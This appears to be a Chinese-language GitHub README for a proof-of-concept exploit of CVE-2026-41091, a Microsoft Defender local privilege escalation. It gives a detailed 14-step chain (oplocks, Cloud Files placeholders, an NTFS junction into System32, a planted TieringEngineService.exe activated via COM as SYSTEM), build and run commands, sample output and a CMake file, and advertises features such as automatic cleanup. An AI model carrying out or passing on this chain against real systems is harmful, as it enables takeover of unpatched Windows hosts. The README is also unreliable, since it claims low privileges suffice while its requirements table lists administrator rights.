CVE-2026-41091 RedSun | Microsoft Defender 本地权限提升(LPE)漏洞利用。低权限用户可通过 Cloud Files API + NTFS junction 技巧获得 NT AUTHORITY\SYSTEM 🔥。强制 Defender 以 SYSTEM 权限将恶意载荷写入 System32。⚠️ 已在野外被积极利用。CVSS 7.8。补丁:Defender Engine 1.1.26040.8。🛡️ 仅供教育用途的 PoC。

Microsoft Defender 链接跟随漏洞 - 本地权限提升至 NT AUTHORITY\SYSTEM
此仓库包含针对 CVE-2026-41091(Microsoft Defender / Microsoft 恶意软件防护引擎中的关键本地权限提升漏洞)的完整工作概念验证 (PoC) 漏洞利用。通过利用不正确的链接解析 (CWE-59),经过身份验证的低权限攻击者可以获得 NT AUTHORITY\SYSTEM 权限。
此漏洞也称为 "RedSun" 或 "SolarFlare",允许攻击者诱使 Microsoft Defender 使用云文件 API (CfAPI) 和 NTFS 交接点向受保护的系统位置写入具有 SYSTEM 权限的任意文件。
注意: 此仓库包含两个版本:
basic_poc.cpp- 简化算法演示(教学用途)full_poc.cpp- 完整的工作漏洞利用,包含所有功能
| 产品 | 受影响版本 | 修复版本 |
|---|---|---|
| Microsoft 恶意软件防护引擎 | < 1.1.26040.8 | 1.1.26040.8+ |
| Microsoft Defender 反恶意软件平台 | < 4.18.26040.7 | 4.18.26040.7+ |
┌─────────────────────────────────────────────────────────────────────────────┐
│ SOLARFLARE 漏洞利用链 │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ 1. 创建工作目录 │
│ └─> %TEMP%\SF-XXXX\ │
│ │
│ 2. 使用 EICAR 触发 Defender │
│ └─> 将反转的 EICAR 写入诱饵文件 │
│ │
│ 3. 等待 VSS 快照 │
│ └─> 检测卷影副本创建 │
│ │
│ 4. 创建第一批 Oplock │
│ └─> 在诱饵文件上执行 FSCTL_REQUEST_BATCH_OPLOCK │
│ │
│ 5. 等待 Oplock 中断 │
│ └─> 获取独占访问 │
│ │
│ 6. 重命名目录 │
│ └─> 将原始目录移至 .tmp │
│ │
│ 7. 注册云同步根 │
│ └─> 使用云文件 API 执行 CfRegisterSyncRoot │
│ │
│ 8. 创建云占位符 │
│ └─> 为诱饵文件执行 CfCreatePlaceholders │
│ │
│ 9. 创建第二批 Oplock │
│ └─> 在云占位符上执行 FSCTL_REQUEST_BATCH_OPLOCK │
│ │
│ 10. 等待第二次 Oplock 中断 │
│ └─> 获取独占访问 │
│ │
│ 11. 重命名云目录 │
│ └─> 将云目录移至 .cloud.tmp │
│ │
│ 12. 创建指向 System32 的 NTFS 交接点 │
│ └─> 重定向至 C:\Windows\System32 │
│ │
│ 13. 复制负载到 System32 │
│ └─> 将诱饵文件复制到 System32 并命名为 TieringEngineService.exe │
│ │
│ 14. 以 SYSTEM 身份激活服务 │
│ └─> CoCreateInstance(StorageTiersManagement) │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
# 克隆仓库
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit
# 使用 Visual Studio 开发者命令提示符构建
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# 或构建基础版本
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
full_poc.exe
basic_poc.exe
CVE-2026-41091 SolarFlare PoC
===============================
by @tc4dy | CVSS 7.8
===============================
[*] SolarFlare 漏洞利用已启动。
[*] 创建工作目录...
[+] 目录已创建: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] 使用 EICAR 触发 Defender...
[+] Defender 已触发
[*] 等待 VSS 快照...
[+] VSS 快照已检测到
[*] 创建第一个 oplock...
[+] 第一个 oplock 已创建
[*] 等待 oplock 中断...
[+] Oplock 已获取
[*] 重命名目录...
[+] 目录已重命名
[*] 创建第二个 oplock...
[+] 第二个 oplock 已创建
[*] 等待第二个 oplock...
[+] 第二个 oplock 已获取
[*] 重命名云目录...
[+] 云目录已重命名
[*] 创建指向 System32 的 NTFS 交接点...
[+] 交接点已创建
[*] 等待 Defender 完成...
[*] 复制负载到 System32...
[+] 负载已复制到 C:\Windows\System32\TieringEngineService.exe
[*] 激活 Storage Tiers Management 服务...
[+] 服务已作为 SYSTEM 激活
[+] 已获得 SYSTEM 访问权限!
CVE-2026-41091 Basic PoC
========================================
仅算法演示
========================================
[*] 启动漏洞利用算法...
[*] 创建工作目录...
[+] 目录已创建: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] 使用 EICAR 触发 Defender...
[+] Defender 已触发
[*] 等待 VSS 快照...
[+] VSS 已检测到
[*] 创建第一个 oplock...
[+] 第一个 oplock 已创建
[*] 等待 oplock 中断...
[+] Oplock 已获取
[*] 重命名目录...
[+] 目录已重命名
[*] 创建第二个 oplock...
[+] 第二个 oplock 已创建
[*] 等待第二个 oplock...
[+] 第二个 oplock 已获取
[*] 创建指向 System32 的 NTFS 交接点...
[+] 交接点已创建
[*] 等待 Defender 完成...
[*] 复制负载到 System32...
[+] 负载已复制到 C:\Windows\System32\Payload.exe
[+] 算法演示完成!
[i] 这仅为基础算法。
[i] 要获得完整的 SYSTEM 权限提升,
[i] 请使用带有云 API 和 COM 激活的 full_poc.cpp。
# 完整漏洞利用
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# 基础 PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)
set(CMAKE_CXX_STANDARD 17)
add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)
add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)
查看我的其他漏洞利用仓库:
| 类别 | 功能 |
|---|
| 利用 | ✅ 本地权限提升至 SYSTEM ✅ 云文件 API (CfAPI) 集成 ✅ 云占位符创建 ✅ NTFS 交接点重定向 |
| 技术 | ✅ 批量 oplock 滥用 ✅ VSS 快照检测 ✅ EICAR 触发 ✅ COM 服务激活 |
| 目标 | ✅ Microsoft Defender < 1.1.26040.8 ✅ Windows 10/11 ✅ Windows Server 2019/2022 |
| 可用性 | ✅ 详细日志记录 ✅ 错误处理 ✅ 随机目录名 ✅ 自动清理 |
| 属性 | 值 |
|---|
| CVE ID | CVE-2026-41091 |
| CVSS 分数 | 7.8(高) |
| CVSS 向量 | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| 攻击向量 | 本地 |
| 所需权限 | 低 |
| 用户交互 | 无 |
| 影响 | SYSTEM 级代码执行 |
| CISA KEV | ✅ 是(已在野外被积极利用) |
| 可用补丁 | Microsoft 恶意软件防护引擎 1.1.26040.8 |
| 要求 | 详情 |
|---|
| 操作系统 | Windows 10/11, Server 2019/2022 |
| 权限 | 管理员(用于执行) |
| Defender | 必须启用 Microsoft Defender |
| 互联网 | VSS 快照检测需要 |
| 补丁 | 仅在未修补系统上有效 |
| 架构 | 仅 x64 |